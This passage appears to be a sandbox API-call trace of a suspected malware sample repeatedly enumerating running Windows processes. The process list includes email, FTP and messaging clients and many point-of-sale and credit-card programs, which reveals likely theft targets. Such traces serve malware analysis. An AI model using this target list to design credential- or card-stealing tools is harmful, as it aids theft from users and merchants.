th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0197.591] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0197.593] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0197.595] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0197.598] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0197.600] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0197.602] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0197.604] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0197.605] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0197.607] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0197.609] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0197.611] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0197.613] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0197.615] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0197.617] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0197.619] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0197.621] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0197.623] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0197.627] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0197.629] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0197.631] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0197.633] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0197.635] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0197.638] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0197.640] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0197.642] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0197.643] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0197.645] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0197.647] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0197.649] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0197.650] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0197.652] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0197.655] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0197.657] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0197.659] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0197.661] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0197.663] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0197.666] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0197.668] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.670] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0197.672] CloseHandle (hObject=0x1cd8) returned 1 [0197.672] Sleep (dwMilliseconds=0x64) [0197.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c8 [0197.795] Process32First (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.798] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.802] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.804] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.807] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.810] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.812] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.815] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.859] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.862] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.864] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.867] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.870] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.872] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.875] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.877] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.880] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.882] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.885] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.887] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.890] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0197.893] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.966] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0197.969] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.972] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0197.974] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0197.977] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0197.980] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0197.982] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0197.985] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0197.988] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.991] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.993] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0197.996] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.000] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.003] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.010] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0198.012] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0198.015] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0198.017] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0198.020] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0198.023] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0198.025] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0198.028] Process32Next (in: hSnapshot=0x19c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0198.030] Process32Next (in: 